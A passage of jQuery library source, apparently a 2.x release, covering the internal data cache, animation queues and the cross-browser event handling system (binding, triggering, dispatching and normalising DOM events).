			jQuery.access( elems, fn, i, key[i], true, emptyGet, raw );
		}

	// Sets one value
	} else if ( value !== undefined ) {
		chainable = true;

		if ( !jQuery.isFunction( value ) ) {
			raw = true;
		}

		if ( bulk ) {
			// Bulk operations run against the entire set
			if ( raw ) {
				fn.call( elems, value );
				fn = null;

			// ...except when executing function values
			} else {
				bulk = fn;
				fn = function( elem, key, value ) {
					return bulk.call( jQuery( elem ), value );
				};
			}
		}

		if ( fn ) {
			for ( ; i < len; i++ ) {
				fn( elems[i], key, raw ? value : value.call( elems[i], i, fn( elems[i], key ) ) );
			}
		}
	}

	return chainable ?
		elems :

		// Gets
		bulk ?
			fn.call( elems ) :
			len ? fn( elems[0], key ) : emptyGet;
};


/**
 * Determines whether an object can have data
 */
jQuery.acceptData = function( owner ) {
	// Accepts only:
	//  - Node
	//    - Node.ELEMENT_NODE
	//    - Node.DOCUMENT_NODE
	//  - Object
	//    - Any
	/* jshint -W018 */
	return owner.nodeType === 1 || owner.nodeType === 9 || !( +owner.nodeType );
};


function Data() {
	// Support: Android<4,
	// Old WebKit does not have Object.preventExtensions/freeze method,
	// return new empty object instead with no [[set]] accessor
	Object.defineProperty( this.cache = {}, 0, {
		get: function() {
			return {};
		}
	});

	this.expando = jQuery.expando + Data.uid++;
}

Data.uid = 1;
Data.accepts = jQuery.acceptData;

Data.prototype = {
	key: function( owner ) {
		// We can accept data for non-element nodes in modern browsers,
		// but we should not, see #8335.
		// Always return the key for a frozen object.
		if ( !Data.accepts( owner ) ) {
			return 0;
		}

		var descriptor = {},
			// Check if the owner object already has a cache key
			unlock = owner[ this.expando ];

		// If not, create one
		if ( !unlock ) {
			unlock = Data.uid++;

			// Secure it in a non-enumerable, non-writable property
			try {
				descriptor[ this.expando ] = { value: unlock };
				Object.defineProperties( owner, descriptor );

			// Support: Android<4
			// Fallback to a less secure definition
			} catch ( e ) {
				descriptor[ this.expando ] = unlock;
				jQuery.extend( owner, descriptor );
			}
		}

		// Ensure the cache object
		if ( !this.cache[ unlock ] ) {
			this.cache[ unlock ] = {};
		}

		return unlock;
	},
	set: function( owner, data, value ) {
		var prop,
			// There may be an unlock assigned to this node,
			// if there is no entry for this "owner", create one inline
			// and set the unlock as though an owner entry had always existed
			unlock = this.key( owner ),
			cache = this.cache[ unlock ];

		// Handle: [ owner, key, value ] args
		if ( typeof data === "string" ) {
			cache[ data ] = value;

		// Handle: [ owner, { properties } ] args
		} else {
			// Fresh assignments by object are shallow copied
			if ( jQuery.isEmptyObject( cache ) ) {
				jQuery.extend( this.cache[ unlock ], data );
			// Otherwise, copy the properties one-by-one to the cache object
			} else {
				for ( prop in data ) {
					cache[ prop ] = data[ prop ];
				}
			}
		}
		return cache;
	},
	get: function( owner, key ) {
		// Either a valid cache is found, or will be created.
		// New caches will be created and the unlock returned,
		// allowing direct access to the newly created
		// empty data object. A valid owner object must be provided.
		var cache = this.cache[ this.key( owner ) ];

		return key === undefined ?
			cache : cache[ key ];
	},
	access: function( owner, key, value ) {
		var stored;
		// In cases where either:
		//
		//   1. No key was specified
		//   2. A string key was specified, but no value provided
		//
		// Take the "read" path and allow the get method to determine
		// which value to return, respectively either:
		//
		//   1. The entire cache object
		//   2. The data stored at the key
		//
		if ( key === undefined ||
				((key && typeof key === "string") && value === undefined) ) {

			stored = this.get( owner, key );

			return stored !== undefined ?
				stored : this.get( owner, jQuery.camelCase(key) );
		}

		// [*]When the key is not a string, or both a key and value
		// are specified, set or extend (existing objects) with either:
		//
		//   1. An object of properties
		//   2. A key and value
		//
		this.set( owner, key, value );

		// Since the "set" path can have two possible entry points
		// return the expected data based on which path was taken[*]
		return value !== undefined ? value : key;
	},
	remove: function( owner, key ) {
		var i, name, camel,
			unlock = this.key( owner ),
			cache = this.cache[ unlock ];

		if ( key === undefined ) {
			this.cache[ unlock ] = {};

		} else {
			// Support array or space separated string of keys
			if ( jQuery.isArray( key ) ) {
				// If "name" is an array of keys...
				// When data is initially created, via ("key", "val") signature,
				// keys will be converted to camelCase.
				// Since there is no way to tell _how_ a key was added, remove
				// both plain key and camelCase key. #12786
				// This will only penalize the array argument path.
				name = key.concat( key.map( jQuery.camelCase ) );
			} else {
				camel = jQuery.camelCase( key );
				// Try the string as a key before any manipulation
				if ( key in cache ) {
					name = [ key, camel ];
				} else {
					// If a key with the spaces exists, use it.
					// Otherwise, create an array by matching non-whitespace
					name = camel;
					name = name in cache ?
						[ name ] : ( name.match( rnotwhite ) || [] );
				}
			}

			i = name.length;
			while ( i-- ) {
				delete cache[ name[ i ] ];
			}
		}
	},
	hasData: function( owner ) {
		return !jQuery.isEmptyObject(
			this.cache[ owner[ this.expando ] ] || {}
		);
	},
	discard: function( owner ) {
		if ( owner[ this.expando ] ) {
			delete this.cache[ owner[ this.expando ] ];
		}
	}
};
var data_priv = new Data();

var data_user = new Data();



//	Implementation Summary
//
//	1. Enforce API surface and semantic compatibility with 1.9.x branch
//	2. Improve the module's maintainability by reducing the storage
//		paths to a single mechanism.
//	3. Use the same single mechanism to support "private" and "user" data.
//	4. _Never_ expose "private" data to user code (TODO: Drop _data, _removeData)
//	5. Avoid exposing implementation details on user objects (eg. expando properties)
//	6. Provide a clear path for implementation upgrade to WeakMap in 2014

var rbrace = /^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,
	rmultiDash = /([A-Z])/g;

function dataAttr( elem, key, data ) {
	var name;

	// If nothing was found internally, try to fetch any
	// data from the HTML5 data-* attribute
	if ( data === undefined && elem.nodeType === 1 ) {
		name = "data-" + key.replace( rmultiDash, "-$1" ).toLowerCase();
		data = elem.getAttribute( name );

		if ( typeof data === "string" ) {
			try {
				data = data === "true" ? true :
					data === "false" ? false :
					data === "null" ? null :
					// Only convert to a number if it doesn't change the string
					+data + "" === data ? +data :
					rbrace.test( data ) ? jQuery.parseJSON( data ) :
					data;
			} catch( e ) {}

			// Make sure we set the data so it isn't changed later
			data_user.set( elem, key, data );
		} else {
			data = undefined;
		}
	}
	return data;
}

jQuery.extend({
	hasData: function( elem ) {
		return data_user.hasData( elem ) || data_priv.hasData( elem );
	},

	data: function( elem, name, data ) {
		return data_user.access( elem, name, data );
	},

	removeData: function( elem, name ) {
		data_user.remove( elem, name );
	},

	// TODO: Now that all calls to _data and _removeData have been replaced
	// with direct calls to data_priv methods, these can be deprecated.
	_data: function( elem, name, data ) {
		return data_priv.access( elem, name, data );
	},

	_removeData: function( elem, name ) {
		data_priv.remove( elem, name );
	}
});

jQuery.fn.extend({
	data: function( key, value ) {
		var i, name, data,
			elem = this[ 0 ],
			attrs = elem && elem.attributes;

		// Gets all values
		if ( key === undefined ) {
			if ( this.length ) {
				data = data_user.get( elem );

				if ( elem.nodeType === 1 && !data_priv.get( elem, "hasDataAttrs" ) ) {
					i = attrs.length;
					while ( i-- ) {

						// Support: IE11+
						// The attrs elements can be null (#14894)
						if ( attrs[ i ] ) {
							name = attrs[ i ].name;
							if ( name.indexOf( "data-" ) === 0 ) {
								name = jQuery.camelCase( name.slice(5) );
								dataAttr( elem, name, data[ name ] );
							}
						}
					}
					data_priv.set( elem, "hasDataAttrs", true );
				}
			}

			return data;
		}

		// Sets multiple values
		if ( typeof key === "object" ) {
			return this.each(function() {
				data_user.set( this, key );
			});
		}

		return access( this, function( value ) {
			var data,
				camelKey = jQuery.camelCase( key );

			// The calling jQuery object (element matches) is not empty
			// (and therefore has an element appears at this[ 0 ]) and the
			// `value` parameter was not undefined. An empty jQuery object
			// will result in `undefined` for elem = this[ 0 ] which will
			// throw an exception if an attempt to read a data cache is made.
			if ( elem && value === undefined ) {
				// Attempt to get data from the cache
				// with the key as-is
				data = data_user.get( elem, key );
				if ( data !== undefined ) {
					return data;
				}

				// Attempt to get data from the cache
				// with the key camelized
				data = data_user.get( elem, camelKey );
				if ( data !== undefined ) {
					return data;
				}

				// Attempt to "discover" the data in
				// HTML5 custom data-* attrs
				data = dataAttr( elem, camelKey, undefined );
				if ( data !== undefined ) {
					return data;
				}

				// We tried really hard, but the data doesn't exist.
				return;
			}

			// Set the data...
			this.each(function() {
				// First, attempt to store a copy or reference of any
				// data that might've been store with a camelCased key.
				var data = data_user.get( this, camelKey );

				// For HTML5 data-* attribute interop, we have to
				// store property names with dashes in a camelCase form.
				// This might not apply to all properties...*
				data_user.set( this, camelKey, value );

				// *... In the case of properties that might _actually_
				// have dashes, we need to also store a copy of that
				// unchanged property.
				if ( key.indexOf("-") !== -1 && data !== undefined ) {
					data_user.set( this, key, value );
				}
			});
		}, null, value, arguments.length > 1, null, true );
	},

	removeData: function( key ) {
		return this.each(function() {
			data_user.remove( this, key );
		});
	}
});


jQuery.extend({
	queue: function( elem, type, data ) {
		var queue;

		if ( elem ) {
			type = ( type || "fx" ) + "queue";
			queue = data_priv.get( elem, type );

			// Speed up dequeue by getting out quickly if this is just a lookup
			if ( data ) {
				if ( !queue || jQuery.isArray( data ) ) {
					queue = data_priv.access( elem, type, jQuery.makeArray(data) );
				} else {
					queue.push( data );
				}
			}
			return queue || [];
		}
	},

	dequeue: function( elem, type ) {
		type = type || "fx";

		var queue = jQuery.queue( elem, type ),
			startLength = queue.length,
			fn = queue.shift(),
			hooks = jQuery._queueHooks( elem, type ),
			next = function() {
				jQuery.dequeue( elem, type );
			};

		// If the fx queue is dequeued, always remove the progress sentinel
		if ( fn === "inprogress" ) {
			fn = queue.shift();
			startLength--;
		}

		if ( fn ) {

			// Add a progress sentinel to prevent the fx queue from being
			// automatically dequeued
			if ( type === "fx" ) {
				queue.unshift( "inprogress" );
			}

			// Clear up the last queue stop function
			delete hooks.stop;
			fn.call( elem, next, hooks );
		}

		if ( !startLength && hooks ) {
			hooks.empty.fire();
		}
	},

	// Not public - generate a queueHooks object, or return the current one
	_queueHooks: function( elem, type ) {
		var key = type + "queueHooks";
		return data_priv.get( elem, key ) || data_priv.access( elem, key, {
			empty: jQuery.Callbacks("once memory").add(function() {
				data_priv.remove( elem, [ type + "queue", key ] );
			})
		});
	}
});

jQuery.fn.extend({
	queue: function( type, data ) {
		var setter = 2;

		if ( typeof type !== "string" ) {
			data = type;
			type = "fx";
			setter--;
		}

		if ( arguments.length < setter ) {
			return jQuery.queue( this[0], type );
		}

		return data === undefined ?
			this :
			this.each(function() {
				var queue = jQuery.queue( this, type, data );

				// Ensure a hooks for this queue
				jQuery._queueHooks( this, type );

				if ( type === "fx" && queue[0] !== "inprogress" ) {
					jQuery.dequeue( this, type );
				}
			});
	},
	dequeue: function( type ) {
		return this.each(function() {
			jQuery.dequeue( this, type );
		});
	},
	clearQueue: function( type ) {
		return this.queue( type || "fx", [] );
	},
	// Get a promise resolved when queues of a certain type
	// are emptied (fx is the type by default)
	promise: function( type, obj ) {
		var tmp,
			count = 1,
			defer = jQuery.Deferred(),
			elements = this,
			i = this.length,
			resolve = function() {
				if ( !( --count ) ) {
					defer.resolveWith( elements, [ elements ] );
				}
			};

		if ( typeof type !== "string" ) {
			obj = type;
			type = undefined;
		}
		type = type || "fx";

		while ( i-- ) {
			tmp = data_priv.get( elements[ i ], type + "queueHooks" );
			if ( tmp && tmp.empty ) {
				count++;
				tmp.empty.add( resolve );
			}
		}
		resolve();
		return defer.promise( obj );
	}
});
var pnum = (/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/).source;

var cssExpand = [ "Top", "Right", "Bottom", "Left" ];

var isHidden = function( elem, el ) {
		// isHidden might be called from jQuery#filter function;
		// in that case, element will be second argument
		elem = el || elem;
		return jQuery.css( elem, "display" ) === "none" || !jQuery.contains( elem.ownerDocument, elem );
	};

var rcheckableType = (/^(?:checkbox|radio)$/i);



(function() {
	var fragment = document.createDocumentFragment(),
		div = fragment.appendChild( document.createElement( "div" ) ),
		input = document.createElement( "input" );

	// Support: Safari<=5.1
	// Check state lost if the name is set (#11217)
	// Support: Windows Web Apps (WWA)
	// `name` and `type` must use .setAttribute for WWA (#14901)
	input.setAttribute( "type", "radio" );
	input.setAttribute( "checked", "checked" );
	input.setAttribute( "name", "t" );

	div.appendChild( input );

	// Support: Safari<=5.1, Android<4.2
	// Older WebKit doesn't clone checked state correctly in fragments
	support.checkClone = div.cloneNode( true ).cloneNode( true ).lastChild.checked;

	// Support: IE<=11+
	// Make sure textarea (and checkbox) defaultValue is properly cloned
	div.innerHTML = "<textarea>x</textarea>";
	support.noCloneChecked = !!div.cloneNode( true ).lastChild.defaultValue;
})();
var strundefined = typeof undefined;



support.focusinBubbles = "onfocusin" in window;


var
	rkeyEvent = /^key/,
	rmouseEvent = /^(?:mouse|pointer|contextmenu)|click/,
	rfocusMorph = /^(?:focusinfocus|focusoutblur)$/,
	rtypenamespace = /^([^.]*)(?:\.(.+)|)$/;

function returnTrue() {
	return true;
}

function returnFalse() {
	return false;
}

function safeActiveElement() {
	try {
		return document.activeElement;
	} catch ( err ) { }
}

/*
 * Helper functions for managing events -- not part of the public interface.
 * Props to Dean Edwards' addEvent library for many of the ideas.
 */
jQuery.event = {

	global: {},

	add: function( elem, types, handler, data, selector ) {

		var handleObjIn, eventHandle, tmp,
			events, t, handleObj,
			special, handlers, type, namespaces, origType,
			elemData = data_priv.get( elem );

		// Don't attach events to noData or text/comment nodes (but allow plain objects)
		if ( !elemData ) {
			return;
		}

		// Caller can pass in an object of custom data in lieu of the handler
		if ( handler.handler ) {
			handleObjIn = handler;
			handler = handleObjIn.handler;
			selector = handleObjIn.selector;
		}

		// Make sure that the handler has a unique ID, used to find/remove it later
		if ( !handler.guid ) {
			handler.guid = jQuery.guid++;
		}

		// Init the element's event structure and main handler, if this is the first
		if ( !(events = elemData.events) ) {
			events = elemData.events = {};
		}
		if ( !(eventHandle = elemData.handle) ) {
			eventHandle = elemData.handle = function( e ) {
				// Discard the second event of a jQuery.event.trigger() and
				// when an event is called after a page has unloaded
				return typeof jQuery !== strundefined && jQuery.event.triggered !== e.type ?
					jQuery.event.dispatch.apply( elem, arguments ) : undefined;
			};
		}

		// Handle multiple events separated by a space
		types = ( types || "" ).match( rnotwhite ) || [ "" ];
		t = types.length;
		while ( t-- ) {
			tmp = rtypenamespace.exec( types[t] ) || [];
			type = origType = tmp[1];
			namespaces = ( tmp[2] || "" ).split( "." ).sort();

			// There *must* be a type, no attaching namespace-only handlers
			if ( !type ) {
				continue;
			}

			// If event changes its type, use the special event handlers for the changed type
			special = jQuery.event.special[ type ] || {};

			// If selector defined, determine special event api type, otherwise given type
			type = ( selector ? special.delegateType : special.bindType ) || type;

			// Update special based on newly reset type
			special = jQuery.event.special[ type ] || {};

			// handleObj is passed to all event handlers
			handleObj = jQuery.extend({
				type: type,
				origType: origType,
				data: data,
				handler: handler,
				guid: handler.guid,
				selector: selector,
				needsContext: selector && jQuery.expr.match.needsContext.test( selector ),
				namespace: namespaces.join(".")
			}, handleObjIn );

			// Init the event handler queue if we're the first
			if ( !(handlers = events[ type ]) ) {
				handlers = events[ type ] = [];
				handlers.delegateCount = 0;

				// Only use addEventListener if the special events handler returns false
				if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false ) {
					if ( elem.addEventListener ) {
						elem.addEventListener( type, eventHandle, false );
					}
				}
			}

			if ( special.add ) {
				special.add.call( elem, handleObj );

				if ( !handleObj.handler.guid ) {
					handleObj.handler.guid = handler.guid;
				}
			}

			// Add to the element's handler list, delegates in front
			if ( selector ) {
				handlers.splice( handlers.delegateCount++, 0, handleObj );
			} else {
				handlers.push( handleObj );
			}

			// Keep track of which events have ever been used, for event optimization
			jQuery.event.global[ type ] = true;
		}

	},

	// Detach an event or set of events from an element
	remove: function( elem, types, handler, selector, mappedTypes ) {

		var j, origCount, tmp,
			events, t, handleObj,
			special, handlers, type, namespaces, origType,
			elemData = data_priv.hasData( elem ) && data_priv.get( elem );

		if ( !elemData || !(events = elemData.events) ) {
			return;
		}

		// Once for each type.namespace in types; type may be omitted
		types = ( types || "" ).match( rnotwhite ) || [ "" ];
		t = types.length;
		while ( t-- ) {
			tmp = rtypenamespace.exec( types[t] ) || [];
			type = origType = tmp[1];
			namespaces = ( tmp[2] || "" ).split( "." ).sort();

			// Unbind all events (on this namespace, if provided) for the element
			if ( !type ) {
				for ( type in events ) {
					jQuery.event.remove( elem, type + types[ t ], handler, selector, true );
				}
				continue;
			}

			special = jQuery.event.special[ type ] || {};
			type = ( selector ? special.delegateType : special.bindType ) || type;
			handlers = events[ type ] || [];
			tmp = tmp[2] && new RegExp( "(^|\\.)" + namespaces.join("\\.(?:.*\\.|)") + "(\\.|$)" );

			// Remove matching events
			origCount = j = handlers.length;
			while ( j-- ) {
				handleObj = handlers[ j ];

				if ( ( mappedTypes || origType === handleObj.origType ) &&
					( !handler || handler.guid === handleObj.guid ) &&
					( !tmp || tmp.test( handleObj.namespace ) ) &&
					( !selector || selector === handleObj.selector || selector === "**" && handleObj.selector ) ) {
					handlers.splice( j, 1 );

					if ( handleObj.selector ) {
						handlers.delegateCount--;
					}
					if ( special.remove ) {
						special.remove.call( elem, handleObj );
					}
				}
			}

			// Remove generic event handler if we removed something and no more handlers exist
			// (avoids potential for endless recursion during removal of special event handlers)
			if ( origCount && !handlers.length ) {
				if ( !special.teardown || special.teardown.call( elem, namespaces, elemData.handle ) === false ) {
					jQuery.removeEvent( elem, type, elemData.handle );
				}

				delete events[ type ];
			}
		}

		// Remove the expando if it's no longer used
		if ( jQuery.isEmptyObject( events ) ) {
			delete elemData.handle;
			data_priv.remove( elem, "events" );
		}
	},

	trigger: function( event, data, elem, onlyHandlers ) {

		var i, cur, tmp, bubbleType, ontype, handle, special,
			eventPath = [ elem || document ],
			type = hasOwn.call( event, "type" ) ? event.type : event,
			namespaces = hasOwn.call( event, "namespace" ) ? event.namespace.split(".") : [];

		cur = tmp = elem = elem || document;

		// Don't do events on text and comment nodes
		if ( elem.nodeType === 3 || elem.nodeType === 8 ) {
			return;
		}

		// focus/blur morphs to focusin/out; ensure we're not firing them right now
		if ( rfocusMorph.test( type + jQuery.event.triggered ) ) {
			return;
		}

		if ( type.indexOf(".") >= 0 ) {
			// Namespaced trigger; create a regexp to match event type in handle()
			namespaces = type.split(".");
			type = namespaces.shift();
			namespaces.sort();
		}
		ontype = type.indexOf(":") < 0 && "on" + type;

		// Caller can pass in a jQuery.Event object, Object, or just an event type string
		event = event[ jQuery.expando ] ?
			event :
			new jQuery.Event( type, typeof event === "object" && event );

		// Trigger bitmask: & 1 for native handlers; & 2 for jQuery (always true)
		event.isTrigger = onlyHandlers ? 2 : 3;
		event.namespace = namespaces.join(".");
		event.namespace_re = event.namespace ?
			new RegExp( "(^|\\.)" + namespaces.join("\\.(?:.*\\.|)") + "(\\.|$)" ) :
			null;

		// Clean up the event in case it is being reused
		event.result = undefined;
		if ( !event.target ) {
			event.target = elem;
		}

		// Clone any incoming data and prepend the event, creating the handler arg list
		data = data == null ?
			[ event ] :
			jQuery.makeArray( data, [ event ] );

		// Allow special events to draw outside the lines
		special = jQuery.event.special[ type ] || {};
		if ( !onlyHandlers && special.trigger && special.trigger.apply( elem, data ) === false ) {
			return;
		}

		// Determine event propagation path in advance, per W3C events spec (#9951)
		// Bubble up to document, then to window; watch for a global ownerDocument var (#9724)
		if ( !onlyHandlers && !special.noBubble && !jQuery.isWindow( elem ) ) {

			bubbleType = special.delegateType || type;
			if ( !rfocusMorph.test( bubbleType + type ) ) {
				cur = cur.parentNode;
			}
			for ( ; cur; cur = cur.parentNode ) {
				eventPath.push( cur );
				tmp = cur;
			}

			// Only add window if we got to document (e.g., not plain obj or detached DOM)
			if ( tmp === (elem.ownerDocument || document) ) {
				eventPath.push( tmp.defaultView || tmp.parentWindow || window );
			}
		}

		// Fire handlers on the event path
		i = 0;
		while ( (cur = eventPath[i++]) && !event.isPropagationStopped() ) {

			event.type = i > 1 ?
				bubbleType :
				special.bindType || type;

			// jQuery handler
			handle = ( data_priv.get( cur, "events" ) || {} )[ event.type ] && data_priv.get( cur, "handle" );
			if ( handle ) {
				handle.apply( cur, data );
			}

			// Native handler
			handle = ontype && cur[ ontype ];
			if ( handle && handle.apply && jQuery.acceptData( cur ) ) {
				event.result = handle.apply( cur, data );
				if ( event.result === false ) {
					event.preventDefault();
				}
			}
		}
		event.type = type;

		// If nobody prevented the default action, do it now
		if ( !onlyHandlers && !event.isDefaultPrevented() ) {

			if ( (!special._default || special._default.apply( eventPath.pop(), data ) === false) &&
				jQuery.acceptData( elem ) ) {

				// Call a native DOM method on the target with the same name name as the event.
				// Don't do default actions on window, that's where global variables be (#6170)
				if ( ontype && jQuery.isFunction( elem[ type ] ) && !jQuery.isWindow( elem ) ) {

					// Don't re-trigger an onFOO event when we call its FOO() method
					tmp = elem[ ontype ];

					if ( tmp ) {
						elem[ ontype ] = null;
					}

					// Prevent re-triggering of the same event, since we already bubbled it above
					jQuery.event.triggered = type;
					elem[ type ]();
					jQuery.event.triggered = undefined;

					if ( tmp ) {
						elem[ ontype ] = tmp;
					}
				}
			}
		}

		return event.result;
	},

	dispatch: function( event ) {

		// Make a writable jQuery.Event from the native event object
		event = jQuery.event.fix( event );

		var i, j, ret, matched, handleObj,
			handlerQueue = [],
			args = slice.call( arguments ),
			handlers = ( data_priv.get( this, "events" ) || {} )[ event.type ] || [],
			special = jQuery.event.special[ event.type ] || {};

		// Use the fix-ed jQuery.Event rather than the (read-only) native event
		args[0] = event;
		event.delegateTarget = this;

		// Call the preDispatch hook for the mapped type, and let it bail if desired
		if ( special.preDispatch && special.preDispatch.call( this, event ) === false ) {
			return;
		}

		// Determine handlers
		handlerQueue = jQuery.event.handlers.call( this, event, handlers );

		// Run delegates first; they may want to stop propagation beneath us
		i = 0;
		while ( (matched = handlerQueue[ i++ ]) && !event.isPropagationStopped() ) {
			event.currentTarget = matched.elem;

			j = 0;
			while ( (handleObj = matched.handlers[ j++ ]) && !event.isImmediatePropagationStopped() ) {

				// Triggered event must either 1) have no namespace, or 2) have namespace(s)
				// a subset or equal to those in the bound event (both can have no namespace).
				if ( !event.namespace_re || event.namespace_re.test( handleObj.namespace ) ) {

					event.handleObj = handleObj;
					event.data = handleObj.data;

					ret = ( (jQuery.event.special[ handleObj.origType ] || {}).handle || handleObj.handler )
							.apply( matched.elem, args );

					if ( ret !== undefined ) {
						if ( (event.result = ret) === false ) {
							event.preventDefault();
							event.stopPropagation();
						}
					}
				}
			}
		}

		// Call the postDispatch hook for the mapped type
		if ( special.postDispatch ) {
			special.postDispatch.call( this, event );
		}

		return event.result;
	},

	handlers: function( event, handlers ) {
		var i, matches, sel, handleObj,
			handlerQueue = [],
			delegateCount = handlers.delegateCount,
			cur = event.target;

		// Find delegate handlers
		// Black-hole SVG <use> instance trees (#13180)
		// Avoid non-left-click bubbling in Firefox (#3861)
		if ( delegateCount && cur.nodeType && (!event.button || event.type !== "click") ) {

			for ( ; cur !== this; cur = cur.parentNode || this ) {

				// Don't process clicks on disabled elements (#6911, #8165, #11382, #11764)
				if ( cur.disabled !== true || event.type !== "click" ) {
					matches = [];
					for ( i = 0; i < delegateCount; i++ ) {
						handleObj = handlers[ i ];

						// Don't conflict with Object.prototype properties (#13203)
						sel = handleObj.selector + " ";

						if ( matches[ sel ] === undefined ) {
							matches[ sel ] = handleObj.needsContext ?
								jQuery( sel, this ).index( cur ) >= 0 :
								jQuery.find( sel, this, null, [ cur ] ).length;
						}
						if ( matches[ sel ] ) {
							matches.push( handleObj );
						}
					}
					if ( matches.length ) {
						handlerQueue.push({ elem: cur, handlers: matches });
					}
				}
			}
		}

		// Add the remaining (directly-bound) handlers
		if ( delegateCount < handlers.length ) {
			handlerQueue.push({ elem: this, handlers: handlers.slice( delegateCount ) });
		}

		return handlerQueue;
	},

	// Includes some event props shared by KeyEvent and MouseEvent
	props: "altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),

	fixHooks: {},

	keyHooks: {
		props: "char charCode key keyCode".split(" "),
		filter: function( event, original ) {

			// Add which for key events
			if ( event.which == null ) {
				event.which = original.charCode != null ? original.charCode : original.keyCode;
			}

			return event;
		}
	},

	mouseHooks: {
		props: "button buttons clientX clientY offsetX offsetY pageX pageY screenX screenY toElement".split(" "),
		filter: function( event, original ) {
			var eventDoc, doc, body,
				button = original.button;

			// Calculate pageX/Y if missing and clientX/Y available
			if ( event.pageX == null && original.clientX != null ) {
				eventDoc = event.target.ownerDocument || document;
				doc = eventDoc.documentElement;
				body = eventDoc.body;

				event.pageX = original.clientX + ( doc && doc.scrollLeft || body && body.scrollLeft || 0 ) - ( doc && doc.clientLeft || body && body.clientLeft || 0 );
				event.pageY = original.clientY + ( doc && doc.scrollTop  || body && body.scrollTop  || 0 ) - ( doc && doc.clientTop  || body && body.clientTop  || 0 );
			}

			// Add which for click: 1 === left; 2 === middle; 3 === right
			// Note: button is not normalized, so don't use it
			if ( !event.which && button !== undefined ) {
				event.which = ( button & 1 ? 1 : ( button & 2 ? 3 : ( button & 4 ? 2 : 0 ) ) );
			}

			return event;
		}
	},

	fix: function( event ) {
		if ( event[ jQuery.expando ] ) {
			return event;
		}

		// Create a writable copy of the event object and normalize some properties
		var i, prop, copy,
			type = event.type,
			originalEvent = event,
			fixHook = this.fixHooks[ type ];

		if ( !fixHook ) {
			this.fixHooks[ type ] = fixHook =
				rmouseEvent.test( type ) ? this.mouseHooks :
				rkeyEvent.test( type ) ? this.keyHooks :
				{};
		}
		copy = fixHook.props ? this.props.concat( fixHook.props ) : this.props;

		event = new jQuery.Event( originalEvent );

		i = copy.length;
		while ( i-- ) {
			prop = copy[ i ];
			event[ prop ] = originalEvent[ prop ];
		}

		// Support: Cordova 2.5 (WebKit) (#13255)
		// All events should have a target; Cordova deviceready doesn't
		if ( !event.target ) {
			event.target = document;
		}

		// Support: Safari 6.0+, Chrome<28
		// Target should not be a text node (#504, #13143)
		if ( event.target.nodeType === 3 ) {
			event.target = event.target.parentNode;
		}

		return fixHook.filter ? fixHook.filter( event, originalEvent ) : event;
	},

	special: {
		load: {
			// Prevent triggered image.load events from bubbling to window.load
			noBubble: true
		},
		focus: {
			// Fire native event if possible so blur/focus sequence is correct
			trigger: function() {
				if ( this !== safeActiveElement() && this.focus ) {
					this.focus();
					return false;
				}
			},
			delegateType: "focusin"
		},
		blur: {
			trigger: function() {
				if ( this === safeActiveElement() && this.blur ) {
					this.blur();
					return false;
				}
			},
			delegateType: "focusout"
		},
		click: {
			// For checkbox, fire native event so checked state will be right
			trigger: function() {
				if ( this.type === "checkbox" && this.click && jQuery.nodeName( this, "input" ) ) {
					this.click();
					return false;
				}
			},

			// For cross-browser consistency, don't fire native .click() on links
			_default: function( event ) {
				return jQuery.nodeName( event.target, "a" );
			}
		},

		beforeunload: {
			postDispatch: function( event ) {

				// Support: Firefox 20+
				// Firefox doesn't alert if the returnValue field is not set.
				if ( event.result !== undefined && event.originalEvent ) {
					event.originalEvent.returnValue = event.result;
				}
			}
		}
	},

	simulate: function( type, elem, event, bubble ) {
		// Piggyback on a donor event to simulate a different one.
		// Fake originalEvent to avoid donor's stopPropagation, but if the
		// simulated event prevents default then we do the same on the donor.
		var e = jQuery.extend(
			new jQuery.Event(),
			event,
			{
				type: type,
				isSimulated: true,
				originalEvent: {}
			}
		);
		if ( bubble ) {
			jQuery.event.trigger( e, null, elem );
		} else {
			jQuery.event.dispatch.call( elem, e );
		}
		if ( e.isDefaultPrevented() ) {
			event.preventDefault();
		}
	}
};

jQuery.removeEvent = function( elem, type, handle ) {
	if ( elem.removeEventListener ) {
		elem.removeEventListener( type, handle, false );
	}
};

jQuery.Event = function( src, props ) {
	// Allow instantiation without the 'new' keyword
	if ( !(this instanceof jQuery.Event) ) {
		return new jQuery.Event( src, props );
	}

	// Event object
	if ( src && src.type ) {
		this.originalEvent = src;
		this.type = src.type;

		// Events bubbling up the document may have been marked as prevented
		// by a handler lower down the tree; reflect the correct value.
		this.isDefaultPrevented = src.defaultPrevented ||
				src.defaultPrevented === undefined &&
				// Support: Android<4.0
				src.returnValue === false ?
			returnTrue :
			returnFalse;

	// Event type
	} else {
		this.type = src;
	}

	// Put explicitly provided properties onto the event object
	if ( props ) {
		jQuery.extend( this, props );
	}

	// Create a timestamp if incoming event doesn't have one
	this.timeStamp = src && src.timeStamp || jQuery.now();

	// Mark it as fixed
	this[ jQuery.expando ] = true;
};

// jQuery.Event is based on DOM3 Events as specified by the ECMAScript Language Binding
// http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html
jQuery.Event.prototype = {
	isDefaultPrevented: returnFalse,
	isPropagationStopped: returnFalse,
	isImmediatePropagationStopped: returnFalse,

	preventDefault: function() {
		var e = this.originalEvent;

		this.isDefaultPrevented = returnTrue;

		if ( e && e.preventDefault ) {
			e.preventDefault();
		}
	},
	stopPropagation: function() {
		var e = this.originalEvent;

		this.isPropagationStopped = returnTrue;

		if ( e && e.stopPropagation ) {
			e.stopPropagation();
		}
	},
	stopImmediatePropagation: function() {
		var e = this.originalEvent;

		this.isImmediatePropagationStopped = returnTrue;

		if ( e && e.stopImmediatePropagation ) {
			e.stopImmediatePropagation();
		}

		this.stopPropagation();
	}
};

// Create mouseenter/leave events using mouseover/out and event-time checks
// Support: Chrome 15+
jQuery.each({
	mouseenter: "mouseover",
	mouseleave: "mouseout",
	pointerenter: "pointerover",
	pointerleave: "pointerout"
}, function( orig, fix ) {
	jQuery.event.special[ orig ] = {
		delegateType: fix,
		bindType: fix,

		handle: function( event ) {
			var ret,
				target = this,
				related = event.relatedTarget,
				handleObj = event.handleObj;

			// For mousenter/leave call the handler if related is outside the target.
			// NB: No relatedTarget if the mouse left/entered the browser window
			if ( !related || (related !== target && !jQuery.contains( target, related )) ) {
				event.type = handleObj.origType;
				ret = handleObj.handler.apply( this, arguments );
				event.type = fix;
			}
